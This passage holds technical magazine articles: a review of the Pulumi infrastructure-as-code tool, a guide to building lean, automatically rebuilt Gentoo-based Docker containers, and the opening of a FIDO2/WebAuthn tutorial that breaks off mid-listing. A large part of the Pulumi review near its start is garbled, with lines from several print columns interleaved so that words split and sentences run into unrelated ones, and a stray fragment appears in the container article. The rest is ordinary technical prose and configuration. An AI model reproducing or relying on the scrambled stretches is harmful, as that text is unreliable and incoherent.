Pulumi's central promise is infrastructure as code (IaC). Admins provide their virtual infrastructures in the form of code, and Pulumi makes sure that the virtual resources run as desired on the target platform. In itself, this is not a groundbreaking feature, because other multicloud orchestrators like Terraform can do this, too. What Pulumi advertises as a unique killer feature is that it has not invented a new scripting language but relies on proven programming languages. What exactly can admins look forward to?

Figure 1: Terraform is considered the top dog when it comes to orchestration, but it comes with its own scripting language. Pulumi, on the other hand, relies on scripting languages that many admins already know.


The Nebulous Cloud well-known syntax of common pro-


gramming languages.
Admins and developers now use the “cloud” and describe the desired state of your setup
umbrella term to group an inhomogeneous in a template file. You then feed the file to the
mass of technical approaches and concepts orchestration service of the respective cloud, Program, Project, Stack
that were not originally part of the cloud which sets up the required resources on the
definition. Initially, a cloud was understood to fly. A single command is all it takes to com- If you are dealing with Pulumi for
be classic virtualization combined with an on- pletely wipe out a virtual environment, which the first time, it is best to first famil-
demand API that enabled self-service. is especially beneficial for people who have to iarize yourself with its programming
Today, the cloud industry is far more ad- create similar setups on a regular basis, such model. Here, three terms come to
vanced. According to a general definition, as developers. mind that need further clarification:
today’s cloud also includes the ability to man- The dependable thing about standards is that the program, the project, and the
age your own resources centrally and quickly. there are so many of them, and the subject of
stack. Each of these three elements
Logically, if one major IT trend is the cloud orchestration in the cloud is no exception. AWS
has a dedicated service named CloudForma-
has its own task within the Pulumi
and another major trend is aiming for an ever-
increasing level of automation, clearly the two tion for this task. Microsoft Azure and Google universe.
factors will eventually converge. Cloud services can also be orchestrated. If pri- What Pulumi means when it refers to
In the context of the cloud, convergence also vate clouds such as OpenStack come into play, a program is more or less all the files
makes a great deal of sense. If you need a you’ll find corresponding interfaces there, as that are written in a specific program-
virtual environment comprising a network, a well. Then there is Kubernetes: If you want to ming language and together form
load balancer, several application servers, a operate corresponding workloads in AWS, you a logical unit. For example, if you
database, public IP addresses, and the appro- first have to tinker with the AWS resources and write your own Python class for your
priate firewall rules, you can either configure then run the resulting Kubernetes with the ap-
Pulumi code, it would be part of the
all these services manually through the ap- propriate configuration. You certainly run into
program in the Pulumi language.
propriate APIs, or you can use orchestration no shortage of interfaces.
The project is a little larger. It contains
a program and the metadata needed
If you take a look at other solutions according to the standard procedures for Pulumi. The pulumi up step as-
(e.g., Terraform), you will see that for your choice of scripting language. sumes that working metadata for the
they use a declarative scripting lan- Pulumi does not force admins to use respective program is available, so that
guage. Usually, a markup language a special environment for develop- Pulumi knows what to do.
such as YAML or JSON lets you ment work. Instead, your standard Finally, the stack is a concrete incar-
define the resources in a single file, editor or standard development envi- nation of a project on a cloud plat-
which you then hand over to the or- ronment is used, with all the features form. The stack state is reached when
chestrator. The orchestrator evaluates that are otherwise available. you have successfully started the
the domain-specific language (DSL) Nevertheless, Pulumi is a declara- infrastructure defined by Pulumi on a
file and interprets it accordingly. The tive tool. Once you have written cloud platform and can use it.
disadvantage from the administra- your code, you call pulumi up at the
tor’s point of view is that you have to command line to start the described Working with Pulumi
learn and understand the declarative infrastructure in the desired environ-
scripting language to work with the ment. In practice, Pulumi tries to In theory, the idea behind Pulumi
program. balance the declarative approach of sounds great at first glance. Instead
Pulumi takes a different tack and in- classic tools like Terraform with the of learning a complex declarative
stead relies on the syntax of existing
scripting languages. For example, if you
are familiar with Python (Figure 2),
you can package the infrastructure in
a Python script. Pulumi provides the
appropriate classes for the different
cloud providers, which can be im-
ported in the usual way. If you don’t
work with Python, you have a choice
between TypeScript, JavaScript, Go
(Figure 3), or C#. Pulumi supports all
programming languages from the .NET
framework, including VB and F#. Most
developers will find a language in this
potpourri that suits their taste.
To begin, you load the individual Pu- Figure 2: A resource declaration for Pulumi can be written in Python to create a storage
lumi modules into your IaC document account in Azure.
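Because Figure 2 is only reproduced as a screenshot, here is a comparable sketch in Python. It assumes the pulumi_azure provider package; all resource names are invented for this example:

import pulumi
from pulumi_azure import core, storage

# Resource group and storage account (names invented)
group = core.ResourceGroup("demo-group", location="westeurope")

account = storage.Account(
    "demostorage",
    resource_group_name=group.name,
    location=group.location,
    account_tier="Standard",
    account_replication_type="LRS",
)

# Publish the generated account name as a stack output
pulumi.export("account_name", account.name)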


Working with Pulumi

In theory, the idea behind Pulumi sounds great at first glance. Instead of learning a complex declarative script language, you draw on the skills you already have from working with other programming languages. Indeed, this is one advantage of Pulumi compared with other solutions such as Terraform.
However, from the administrator's or developer's point of view, this advantage should not be rated too highly. Even though Pulumi supports the use of well-known programming and scripting languages, you will still need to read a mass of documentation.

Figure 3: This example performs the same task as the Python example in Figure 2 but is written in Go.

The ability to use well-known scripting languages only makes your job easier in the sense that you can work with a familiar syntax. However, if you have a Python program that is intended to start an instance in AWS, you still need to call the appropriate functions to do so. Pulumi does not abstract the cloud APIs from the program so radically at this point that you could rely on uniform commands for different cloud platforms.
In concrete terms, this means that if you want to start a new instance in AWS, for example, you can do so in Go, Python, or one of the other supported languages. However, you do have to deal with how the present task can be solved with the Pulumi modules for the various clouds, and to do so, you need to understand how the Python pulumi_aws module, which provides the corresponding functions, works. Because pulumi_aws is specific to Pulumi, you have to deal with its syntax, which is all the more true if different workloads are to be set up in different environments with Pulumi. Not only do you need to understand how Pulumi's AWS modules work, but also how to use the modules for the other clouds.
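To illustrate, a sketch of such a pulumi_aws call follows; the AMI ID and instance type are placeholders:

import pulumi
import pulumi_aws as aws

# Start a single EC2 instance (AMI ID is a placeholder)
server = aws.ec2.Instance(
    "web-server",
    ami="ami-0123456789abcdef0",
    instance_type="t3.micro",
    tags={"Name": "pulumi-demo"},
)

pulumi.export("public_ip", server.public_ip)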
To avoid misunderstandings: The Pulumi feature set is clearly oriented to the standards of the market. Other solutions such as Terraform do not fully abstract the respective cloud platform but have different modules for different environments. You have to use these when defining the resources, just as in Pulumi. The only difference is that, in Pulumi, you can use a syntax you already know from your previous work. Whether this really saves as much time as the developers claim in their documentation seems questionable.

Figure 4: The Pulumi service is a central component in the Pulumi stack and acts as a graphical control center. © Pulumi

From Program to Project

What does working with Pulumi look like from the administrator's point of view? First, you need to install Pulumi, but this is not complicated: For Linux systems, the manufacturer offers a downloadable shell script [1] that you call locally. The only required binary, pulumi, is then stored in your home directory. The script automatically extends the PATH variable to include the location of the binary file.
Installing the program on other systems is a similarly relaxed experience. Pulumi is by no means Linux-specific. On macOS, it is included in the Homebrew collection [2], although the installation script for Linux that I mentioned earlier will also do the trick. For Windows, a separate installation wizard is available to help you install Pulumi on your system.

The Pulumi Service

At this point, Pulumi is almost ready for use – almost. Now you need to deal with a service that seems a bit strange at first glance: the Pulumi service app.pulumi.com, a centrally operated directory for Pulumi stacks of individual users (Figure 4). The manufacturer describes the Pulumi service as a kind of support for the administrator in managing their rolled-out setups: From here, various stack parameters can be changed or examined.
For the open source version of Pulumi, the manufacturer assumes that the app is centrally operated by the provider and remains free for personal use by the user. If you want to use the Pulumi service commercially, license costs are incurred, which I will discuss in detail later. In the Enterprise version, it is also possible to run a separate instance of the Pulumi service locally, which is a particularly useful alternative if you do not want to pass on certain information (e.g., details of your own stacks and where they are rolled out) to third parties.
The remainder of this article assumes private use, for which Pulumi does not charge. However, you do have to create an account, because the first time pulumi new is called, the command-line tool tries to connect to the service and create a corresponding entry there. Single sign-on for Pulumi's hosted app service will work with a variety of providers; for example, you can use a GitHub account. Once the Pulumi account has been created, it's time to get started with the actual project.

First Project

In a freshly created directory, run the pulumi new <Project> command. After prompting you for the login credentials for Pulumi's App Service, a wizard launches to guide you through the most important steps of the setup and prompt you for various parameters. You can decide whether this is a project for AWS, what the credentials for the AWS account are, or in which AWS region the rollout will take place. Now, with your preferred scripting language, define the desired virtual environment such that it contains all the necessary components. Once the project meets your requirements, the next step is deployment. The

pulumi up

command handles all the necessary steps in the background. The App Service shows that the Pulumi service is far more powerful than it seems at first glance, because it, not the Pulumi binary on the developer's host, handles the communication with the respective cloud services in the background. Detouring by way of the Pulumi app does have some advantages: If a cloud vendor changes something in their APIs, end users do not necessarily have to update their binaries to use the new features.
As soon as the deployment of a stack from within a project is finished, Pulumi shows it as active, and you can use it. If the developer made a mistake or forgot something, the stack can be pushed into a black hole with

pulumi destroy

in the project's folder. All told, the Pulumi service proves to be a helpful tool in everyday development work.
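A typical first session, sketched here with the aws-python template as an example, therefore looks something like this:

$ mkdir quickstart && cd quickstart
$ pulumi new aws-python    # wizard asks for stack name, region, etc.
$ pulumi up                # preview and deploy the stack
$ pulumi destroy           # tear the stack down again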
Supported Target Platforms

How Pulumi takes applications into the cloud is explained in sufficient detail in this article, but what clouds can you manage with Pulumi? Clearly the big hyperscalers will be part of the package: Pulumi not only supports AWS, Azure, and Google Cloud Platform but offers a massive feature set. AWS, for example, is just a roof under which hundreds of services now reside. Pulumi cannot address them all, but in a normal working day with AWS, admins are unlikely to worry about missing functionality. The same applies to Microsoft's Azure and Google's Cloud.
Private solutions are far less well supported. Pulumi has a resource provider (the name of the plugins that extend Pulumi with support for certain OpenStack features) for OpenStack. However, the provider is far removed from supporting all the features that modern OpenStack installations offer and is limited to rather basic support. Pulumi cannot handle the more complex tasks, perhaps because most users simply use Pulumi with the large providers and do not want to deal with additional problems that arise when using Pulumi with private clouds. For example, if you are using a private cloud that cannot be accessed over the Internet, you will inevitably need the Pulumi Enterprise version, so you can operate the Pulumi service locally. If you want to access the large public clouds, you will have no problems with the program; however, it is not suitable for private clouds.


Support for Kubernetes

In addition to genuine infrastructure-as-a-service offerings, Pulumi now also offers strong support for Kubernetes. Little wonder: Strictly speaking, Kubernetes is nothing more than a fleet orchestrator. However, the magic takes place one level higher than in the classic clouds. Kubernetes assumes that it has access to executable systems on which it can install its components and operate containers. A tool like Pulumi would be difficult to imagine without support for Kubernetes; therefore, the developers integrated precisely this function into their software. However, the Pulumi service must be able to communicate with the Kubernetes API for the deployment to work. If the Kubernetes instance can only be reached over a local connection, a local Pulumi service is again needed, which requires the Enterprise version of the product.

Policy as Code

The Pulumi developers draw particular attention to one feature in terms of security, and the product has a kind of unique selling point: Policy as code is the main focus of the Pulumi CrossGuard product.
The narrative goes something like this: Individual developers should not have to ask for resources or manual approval from the manager for every Kubernetes cluster they want to start, because that would lead to enormous administrative overhead. However, administrators should not be able to do what they want on all cloud accounts of a company. An Amazon AWS instance in the appropriate configuration tends to burden your wallet to the extent of $1,000 or more per month. If an administrator's Pulumi project runs amok and starts virtual machines without anyone noticing, a rude awakening threatens at the end of the month in the form of a massive bill.
Pulumi therefore has the option to map a set of rules that provides different permissions for different developers – with the Enterprise version only, for which you again need to put your money on the table; however, it opens a multitude of possibilities. Admins then have the option to define Policy Packs (Figure 5), which contain a set of rules or several related sets of rules that assign different authorizations to different users.
In Policy Packs, granular permissions can be set at the API level of each cloud vendor down to the individual API call, including the parameters for each. For example, if an administrator is only to be allowed to start instances of a specific flavor on AWS, the Policy Pack provides a switch for this. Policy Packs also provide on-demand restrictions for where admins can start specific workloads. For example, if you want to run an unimportant workload on AWS, but only on cheap instances, it would be better to rule out Amazon's high-end data center in Frankfurt for the workload.
In addition to hard prohibitions, Policy Packs also provide warnings. If an admin uses certain services in a public cloud, Pulumi can display a note for the individual case that warns of financial or technical risks. Practically, the policies also use well-known programming languages, so they are implemented like all other programs in Pulumi. The downside is that you have to choose the corresponding descriptions and keywords for the individual scripting languages from the documentation and practice with them before you can create and use Policy Packs in a meaningful way.

Figure 5: You can create Policy rules for Pulumi in Python notation with the Pulumi Enterprise version only, which is available for a charge.
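To give an idea of the notation shown in Figure 5, the following sketch uses the pulumi_policy Python package. The pack and rule names are invented, and the check is deliberately simple:

from pulumi_policy import (
    EnforcementLevel, PolicyPack, ResourceValidationPolicy,
)

# Invented rule: only t3.micro EC2 instances may be started
def check_instance_type(args, report_violation):
    if args.resource_type == "aws:ec2/instance:Instance":
        if args.props.get("instanceType") != "t3.micro":
            report_violation("Only t3.micro instances are allowed.")

PolicyPack(
    name="cheap-instances-only",
    enforcement_level=EnforcementLevel.MANDATORY,
    policies=[
        ResourceValidationPolicy(
            name="instance-type-check",
            description="Restricts EC2 instances to t3.micro.",
            validate=check_instance_type,
        ),
    ],
)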


Differences from Terraform

How does Pulumi perform compared with its direct competitor (and top dog) Terraform, and where do the similarities and differences lie?
First, you have to learn a declarative scripting language in Terraform: the HashiCorp configuration language (HCL), a domain-specific language (DSL). Second, certain constructs like loops, functions, and classes are not available. You will also look in vain for a counterpart to the Pulumi service in Terraform. Instead of communicating with a central service, Terraform creates local state files, which it leaves to the administrator to manage.
Pulumi offers various automation features that are completely missing in Terraform. If you use the Prometheus monitoring, alarming, and trending solution, for example, you can set up basic Pulumi integration right away. The tool integrates running stacks into the solution on request.

Pulumi Commercial

If you want to use Pulumi in a team, you need a Pulumi Team License. The Starter License is designed for three users, costs a moderate $50, and can be used to start 20 stacks. The Pro version for $75 provides access for up to 25 members, teams, and roles; unlimited stacks; and support during business hours.
If you choose the Enterprise package, the price is a matter of negotiation. The package then includes 24/7 support, policies-as-code, and an unlimited number of members in teams. As already mentioned, the Pulumi service can be operated locally if you don't want it in the cloud. A detailed list of the functions associated with each level is provided by the manufacturer on its website [3].

Conclusions

I like the idea behind Pulumi. Anyone who has ever worked with Terraform and rummaged through its complex syntax may have wished they already had the skills it requires. Pulumi offers this possibility, even if not all of the learning overhead is eliminated. The author of a project still has to adjust to how individual classes or functions are called in Pulumi.
What is less pleasing is the relatively hard-wired tie-in to the Pulumi service. Although the tool can theoretically be used without this service, the practical benefits of the Pulumi service are quite clear. In commercial use, however, this also means that you will have to pay; although it is open source software, it is only free for personal use.
At the end of the day, Pulumi's pricing looks reasonable. Because the single-user license costs nothing, the solution can be put through its paces before you pay a single penny to the manufacturer. If you are looking for a tool for multicloud orchestration, Pulumi is definitely worth a look.

Info
[1] Pulumi installation script: [https://www.pulumi.com/docs/get-started/install/]
[2] Homebrew for macOS: [https://brew.sh]
[3] Pulumi Policy Packs: [https://www.pulumi.com/docs/get-started/crossguard/]

The Author
Martin Gerhard Loschwitz is Cloud Platform Architect at Drei Austria and works on topics such as OpenStack, Kubernetes, and Ceph.
Building sustainably safe containers

Build by Number

The basic container images on which you base your work can often be out of date. We show you how to solve this problem and create significantly leaner containers. By Konstantin Agouros

Among other things, my job involves developing applications in the field of network automation on the basis of the Spring Boot framework, which requires a running Java environment. At the same time, some infrastructure applications are required, such as DNS servers.
Before containers existed, infrastructure services ran in minimal change root environments, containing only the necessary binaries (e.g., chroot/named), configuration files, and libraries. This setup reduced the number of potential attack vectors for exposed services. For example, an attempt by the attacker to call /bin/sh would fail because the environment would not have a shell.
Classical Docker build files, which use FROM ubuntu to include a complete Ubuntu environment, are the exact opposite of the approach just described. The resulting container is easier to debug because, for example, a shell is available. However, it is also far larger and less secure because an attacker could find and use the shell binary.
Manufacturers keep their official containers up to date, which means that when the container is rebuilt, an updated Ubuntu would also be dragged in. However, no mechanism automatically triggers such a rebuild. One of my goals was therefore to rebuild automatically all containers that contain components for which patches are available. At the same time, I wanted the containers to be leaner.

Dockerfiles

Docker supports the ability to import the compressed tarball of a change root environment, but the build process is hard to maintain. It makes more sense to use a Dockerfile that contains the components of the image and also lets you import single files from other images. Calling scripts or entire installations might be possible, as well. To create such a container, you would use docker build. To begin, though, copy an archive (usually a .tar.gz) into a folder and create a file named Dockerfile:

FROM dockerrepo.matrix.dev/gentoo-java:latest-amd64
ADD webapp.tar.gz /
ENTRYPOINT ["java", "-jar", "mywebapp.jar"]
EXPOSE 8080/tcp

The first line describes a base image whose filesystem is inserted into the current container. In this case, it's a Gentoo Linux-based image (see the "Why Gentoo?" box) that provides a runnable Java environment. The next line adds the contents of webapp.tar.gz to the root directory of the container. The third line ensures that the call java -jar mywebapp.jar is executed automatically if the container is started with docker run and without arguments. The last line finally exposes port 8080, so that you can leave out the -p 8080:8080 option in the Docker call.
The Docker build process is organized hierarchically. The images provided by the binaries in the container build on each other. Starting with a base image, which is initially created as an empty image with FROM scratch, several images can each completely import another one, which creates the layers that are downloaded one by one from the registry. If a layer remains unchanged, no download is required, saving time and bandwidth.

Why Gentoo?

The system presented here would also work with other distributions. I chose Gentoo because the distribution compiles applications locally from source files. Therefore, you can easily archive and document the sources of the binaries for a later audit of each version of each container. Because admins compile the documentation themselves and the compiler sources are also available, the chain of documentation can be traced back to the source code. Only an infection of the build host would offer an attack vector, and the risk can be mitigated by appropriate protection.


The referenced image, gentoo-java, includes the GNU C library (glibc) image and (because the Java binaries require it) the zlib library and some GNU compiler collection (GCC) libraries. However, only the necessary shared libraries are included, not the complete images. Finally, the glibc image uses a base image in its FROM line, which contains a minimal filesystem with the /etc, /dev, and /tmp directories. Thanks to its hierarchical structure, the build system, described later, can update individual layers of the image separately.
The source files for the images are available as tar.gz archives, which are created from cleaned up file lists of packages. In the container, for example, neither man pages nor sample configurations are needed. Building up with one image per package might sound complex, but it only requires more work in the first step. The application images at the end of the chain can be exported as a single file and integrated into other registries if required.

Practical Implementation

The first step in creating a container image from a package is to collect the files from the operating environment. To help me keep track, I first defined a folder structure. Each container has a folder with a name that follows the <distribution>-<package name> pattern, resulting in folders in the form gentoo-glibc or gentoo-gcc. Each of these folders contains the respective Docker file and the tar.gz archive that was picked up.
GNU Make is used as the build tool because it makes it relatively easy to map dependencies to files by timestamps. If a package was updated since the last creation date of the tar.gz archive, the timestamp of the files is newer and Make triggers an action.
A list of files is necessary to create the archive. The easiest way for an admin on Gentoo to create this list is to run the q files <package> command. To discard unnecessary files, then, use grep filters and pass the resulting list into a tar command that reads the list of files to archive from standard input. For most of the packages that only deliver shared libraries, the section of the Makefile for the libuv package is:

gentoo-libuv/gentoo-libuv.tar.gz: /usr/lib64/libuv.so.1
        q files dev-libs/libuv | grep /usr/lib | tar -c -T - -v -z -f $@

Some packages need more files, so suitable grep filters more or less sort out or sort in. The example also shows the dependency. The archive is only rebuilt if the /usr/lib64/libuv.so.1 file has changed. The manual work for each package now consists of identifying a file that can be used as an indicator for a patch and sorting out which files in the archive are necessary at the end.
My environment has two Makefiles: one to create the tar.gz archives and one that then triggers the Docker build processes. Listing 1 shows the Makefile for the archives. For GCC and Java, a small shell script handles the task of compiling the packages, because softlinks still play a role that would otherwise be missing. The base container is not included in the Makefile, because it is not generated statically, but from packages.
After an upgrade, you now just need to call Make to recreate the archives where necessary, and the containers are then built. Immediately after building they are uploaded to the local registry with the latest tag. The sticking point here was the modification date. Although it is possible to query the modification data of existing containers in the registry or on the local host with an API call, it is difficult to do in the Makefile, which was what prompted me to cheat and simply add && touch builddate to the docker build call and then && touch pushtime after docker push. The two files are only created if the step was successful, and pushtime serves as the target in the Makefile.
To map the hierarchy of the containers in the Makefile, the pushtime files of all images are also included in the dependencies that are necessary to build the container. The Makefile section in Listing 2 illustrates this. The Java image is based on the glibc image, but also copies files from zlib and GCC, which means you have to build and upload these images before the Java image can be created. Listing 3 (abridged) shows the call to Make and its screen output after patches for glibc were released, triggering a rebuild of all containers.
The trickiest task in this approach is that of resolving all the dependencies. Minimizing the container means finding all the necessary shared libraries, and the tool of choice is ldd, which lists the referenced shared libraries of a binary.

Listing 1: Makefile for Archives

all: gentoo-glibc/gentoo-glibc.tar.gz gentoo-gcc/gentoo-gcc.tar.gz gentoo-java/gentoo-java.tar.gz gentoo-gmp/gentoo-gmp.tar.gz gentoo-mpc/gentoo-mpc.tar.gz gentoo-mpfr/gentoo-mpfr.tar.gz

gentoo-glibc/gentoo-glibc.tar.gz: /usr/include/libintl.h
        sh createglibctar.sh

gentoo-gcc/gentoo-gcc.tar.gz: /usr/bin/gcc
        sh creategcctar.sh

gentoo-java/gentoo-java.tar.gz: /usr/lib/jvm/icedtea-bin-8 createjavatar.sh
        sh createjavatar.sh

gentoo-gmp/gentoo-gmp.tar.gz: /usr/lib64/pkgconfig/gmp.pc
        q files dev-libs/gmp |grep usr/lib|tar czvf $@ -T -

gentoo-mpc/gentoo-mpc.tar.gz: /usr/lib64/libmpc.so
        q files dev-libs/mpc |grep lib|grep -v doc|tar czvf $@ -T -

gentoo-mpfr/gentoo-mpfr.tar.gz: /usr/lib64/libmpfr.so
        q files dev-libs/mpfr |grep lib|grep -v doc|tar czvf $@ -T -

gentoo-zlib/gentoo-zlib.tar.gz: /usr/lib64/pkgconfig/zlib.pc
        q files sys-libs/zlib | grep /lib64 | tar cvzf $@ -T -
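A quick check of this kind, with the binary and chroot paths varying from package to package (both are invented here), looks like this:

# List the shared libraries the BIND binary references
ldd /usr/sbin/named

# Test the binary inside the assembled change root first
chroot /build/gentoo-bind /usr/sbin/named -v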


easier to handle in this way. If several binaries are used, the program might launch, but it could throw an error were a certain function called.
Developers also need to keep in mind that shared libraries occasionally change versions of dependencies. If the file used to determine whether the archive needs to be rebuilt is /usr/lib64/libdb-5.3.so, and if version 5.4 is available after the updates, then the indicator file is missing and the Makefile fails. This possibility must be taken into account when selecting the indicator files.

Listing 2: Managing Dependencies

gentoo-java/pushtime: gentoo-java/gentoo-java.tar.gz gentoo-glibc/pushtime gentoo-zlib/pushtime gentoo-gcc/pushtime
        cd gentoo-java; docker build -t dockerrepo.matrix.dev/gentoo-java:latest-amd64 . && touch buildtime && docker push dockerrepo.matrix.dev/gentoo-java:latest-amd64 && touch pushtime

Debugging Containers?

If the container does not work even though all libraries are present, it would normally be possible to find the error by starting a shell in the container; however, this lean approach does not have a shell option. Instead, a debug container can be built very easily. In the first step you need to create a container for the BusyBox package and then the debug container with the Docker file:

FROM dockerrepo/applicationcontainer:latest-amd64
COPY --from=dockerrepo/gentoo-busybox:latest-amd64 /bin/ /bin/

In the busybox container a softlink needs to point from /bin/busybox to /bin/sh, which gives developers a version of the container with an interactive shell. However, this is a separate debug container, which means it is less likely to end up in production by mistake.
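With the debug image built, a shell session can then be opened by overriding the entry point; the image tag is invented for this sketch:

docker build -t myapp-debug .
docker run --rm -it --entrypoint /bin/sh myapp-debug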
Listing 3: Make After glibc Update (Abridged)

# make -f Makefile.docker
cd gentoo-glibc; docker build -t dockerrepo.matrix.dev/gentoo-glibc:latest-amd64 . && touch buildtime && docker push dockerrepo.matrix.dev/gentoo-glibc:latest-amd64 && touch pushtime
Sending build context to Docker daemon 21.12MB
Step 1/2 : FROM dockerrepo.matrix.dev/gentoo-base:latest
 ---> 22fe37b24ebe
Step 2/2 : ADD gentoo-glibc.tar.gz /
 ---> 4e800333acbd
Successfully built 4e800333acbd
Successfully tagged dockerrepo.matrix.dev/gentoo-glibc:latest-amd64
The push refers to repository [dockerrepo.matrix.dev/gentoo-glibc]
22bac475857f: Pushed
636634f1308a: Layer already exists
[...]
Step 2/8 : FROM dockerrepo.matrix.dev/gentoo-glibc:latest-amd64
[...]
Step 8/8 : ADD gentoo-gcc.tar.gz /
 ---> b89e1b4ab2ba
Successfully built b89e1b4ab2ba
Successfully tagged dockerrepo.matrix.dev/gentoo-gcc:latest-amd64
The push refers to repository [dockerrepo.matrix.dev/gentoo-gcc]
794c152bde4c: Pushed
[...]
22bac475857f: Mounted from gentoo-bind
636634f1308a: Layer already exists
latest-amd64: digest: sha256:667609580127bd14d287204eaa00f4844d9a5fd2847118a6025e386969fc88d5 size: 1996
cd gentoo-java; docker build -t dockerrepo.matrix.dev/gentoo-java:latest-amd64 . && touch buildtime && docker push dockerrepo.matrix.dev/gentoo-java:latest-amd64 && touch pushtime
Sending build context to Docker daemon 66.12MB
Step 1/6 : FROM dockerrepo.matrix.dev/gentoo-glibc:latest-amd64
 ---> 4e800333acbd
Step 2/6 : COPY --from=dockerrepo.matrix.dev/gentoo-zlib:latest-amd64 /lib64/* /lib64/
 ---> aaf3f557c027
Step 3/6 : COPY --from=dockerrepo.matrix.dev/gentoo-gcc:latest-amd64 /usr/lib/gcc/x86_64-pc-linux-gnu/9.3.0/lib* /lib64/
 ---> 6f7d7264921c
Step 4/6 : ADD gentoo-java.tar.gz /
 ---> afb2d5612109
Step 5/6 : ENV JAVA_HOME /opt/icedtea-bin-3.16.0
[...]
441dec54d0dd: Pushed
22bac475857f: Mounted from gentoo-glibc
636634f1308a: Layer already exists
latest-amd64: digest: sha256:965aeac1b1cd78cde11aec58d6077f69190954ff59f5064900ae12285e170836 size: 1371

Conclusions

The approach presented here does involve greater initial effort to keep the containers up to date in a fully automated way. In the sense of a continuous integration/continuous deployment pipeline, the applications also need to be tested with every new build to rule out incompatibilities from changes in the libraries.
For Spring Boot applications, the number of dependencies in the Java container is manageable. I have also containerized infrastructure services such as DNS in this way, although the number of containers required is greater. Nevertheless, automatic updating of the containers with this method has proven very useful in production operations.

The Author
Konstantin Agouros works as Head of Open Source and AWS Projects at Matrix Technology AG (Munich, Germany), where he and his team advise customers on open source, security, and cloud issues. His book Software Defined Networking: SDN-Praxis mit Controllern und OpenFlow [Software Defined Networking: Practice with Controllers and OpenFlow] (in German) is published by de Gruyter.


Secure authentication with FIDO2

Replacements
The FIDO and FIDO2 standards support passwordless authentication. We discuss the requirements for the use of FIDO2 and show a sample implementation for a web service. By Matthias Wübbeling

Moving away from passwords to improve account security is a recurring theme for administrators and security researchers. On the Internet, the password as a knowledge-based factor of authentication still dominates the login methods of online services. Password managers are increasingly relieving the burden on users as a weak point in password selection. However, despite all technical support, many users still use passwords that are easy to remember and therefore easy to crack. Projects like Have I Been Pwned [1] or the researchers of the University of Bonn in their EIDI (effective information after a digital identity theft) project [2] follow a reactive approach to account security; web development needs to focus more strongly on alternative authentication methods.
Back in December 2014, the FIDO Alliance published the FIDO Universal Authentication Framework (FIDO UAF) standard, which was intended to enable passwordless authentication. Since the release of the FIDO2 standard with the Web Authentication (WebAuthn) and the Client to Authenticator Protocol (CTAP) components [3], all the major browsers have gradually introduced support for the Web Authentication JavaScript API and the use of security tokens over CTAP.

FIDO2 Functionality

Fortunately, FIDO2 is very straightforward and, although it mainly uses cryptographic keys, quite easy to understand. Before you can log in to a web service as a user, you first need to go through a registration process. During this process, you generate the cryptographic key material – a public and a private key – on a secure device known as the authenticator. The public key is transmitted later to the application server for authentication. The key is stored there and linked to your user account. The private key remains securely stored on the authenticator, which can be an external device or the trusted platform module (TPM) chip in your computer.
Logging in to a web service (Relying Party) works like this: The web application (Relying Party Application) is executed in your web browser. The server sends a challenge to your browser, which the browser signs with your private key and returns to the web service. The browser functions for FIDO authentication are accessed from within the application by the JavaScript API.
Depending on the device you used for key generation during registration, your browser accesses your computer's TPM chip through the operating system or an external authenticator over the CTAP protocol. The authenticator has your private key and needs to generate the signature for the challenge. The process often involves entering a PIN or presenting a biometric feature such as a fingerprint. On local devices, passwordless authentication with biometrics works without problem.


The authenticator returns the signed challenge to the browser, which passes it on to the application server. The server in turn verifies the signature with the stored public key. If it is valid, the login is completed successfully.
The crucial difference with this approach is that you do not need a certificate authority (CA) to verify the user's identity and then issue a certificate. The identity of the user is not the main focus of FIDO, which is also true of password-based authentication. Instead, the aim is to recognize a user reliably, which means you can also use FIDO for secure authentication of what are basically anonymous user accounts. Also, the use of several, and even different, keys is supported. FIDO2 even lets you as a provider prescribe and verify the type of devices used as authenticators. In the course of certification, a model key pair is generated that can also be integrated into the signature process. In this way, you as a provider can ensure that your customers use certain device classes, such as devices that can only be unlocked with a PIN or fingerprint. The model key pair is then installed on all devices of a certain model (i.e., it is model-specific, but not unique to a device).

Trusted Authenticator

To sign the challenge from the application server, you need another device, known as the authenticator, which can be an internal device, the TPM in your computer, or an external device, such as a USB security token like a YubiKey. Android has had FIDO2 certification since February 2019. Therefore, on devices with suitable hardware and Android 7 or higher, you always have an internal authenticator in your pocket. You can unlock it with your fingerprint or the screen lock PIN. For communication with the security token, FIDO defines the CTAP1 and CTAP2 Client to Authenticator protocols; version 1 is also known as Universal 2nd Factor (U2F) and version 2 as FIDO2 or WebAuthn.
For test purposes in this article, I use a YubiKey NFC (near-field communication) stick, version 5, and a fairly new Android smartphone. The YubiKey is directly detected on Linux as Yubico YubiKey OTP+FIDO+CCID, which you can reveal with the command

sudo dmesg -w

by watching the kernel output when plugging in the key. You can then go to the WebAuthn demo page [4] for initial testing. If the authenticator works with your browser, the next step is to try FIDO2 on your own web page.

Creating the Server Application

To test the following examples, I will use the PHP WebAuthn library by Lukas Buchs [5]. If you already use a PHP-enabled server, you can provide the sample application directly in the WebAuthn _test folder and deliver the page. Without an appropriate environment, Docker Compose lets you set up NGINX with PHP quickly and easily (Listing 1).
The NGINX configuration requires the default.conf file (Listing 2), which configures forwarding to the PHP-FPM server for all files ending in .php. Because the client.html file, which is delivered as a static page, is located in the same folder as the server.php file, the same folder is included in both containers in docker-compose.yaml. You can now start the two Docker containers:

docker-compose up

If you then call http://localhost:8080/WebAuthn/_test/client.html in your browser, you will be redirected to a secure HTTPS page, although this connection will fail. The redirection is defined in the WebAuthn client.html file. For this test, it is not necessary, however. Just remove the JavaScript statement that starts with window.onload in client.html (lines 246-253). Afterward, you will probably have to clear the browser cache to avoid being redirected.
You can now access the test application website with the URL mentioned above. When you get there, you can access your browser's WebAuthn API by pressing New Registration and proceed to register the existing security token. If you want to test the application from your smartphone, you need to install a valid SSL certificate. On Android, you could otherwise receive a message that the browser is not compatible.

Passwordless Authentication with PHP

To help you upgrade your own web application with FIDO2, I will refer to the sample application as a guide and look for the important components in the examples for an abstract service of your own.

Listing 1: docker-compose.yaml

web:
  image: nginx:latest
  ports:
    - "8080:80"
  volumes:
    - ./WebAuthn:/usr/share/nginx/html/WebAuthn
    - ./default.conf:/etc/nginx/conf.d/default.conf
  links:
    - php
php:
  image: php:fpm
  volumes:
    - ./WebAuthn:/var/www/html/WebAuthn

Listing 2: default.conf

server {
  index index.php index.html;
  server_name php-docker.local;
  error_log /var/log/nginx/error.log;
  access_log /var/log/nginx/access.log;
  root /code;

  location ~ \.php$ {
    try_files $uri =404;
    fastcgi_split_path_info ^(.+\.php)(/.+)$;
    fastcgi_pass php:9000;
    fastcgi_index index.php;
    include fastcgi_params;
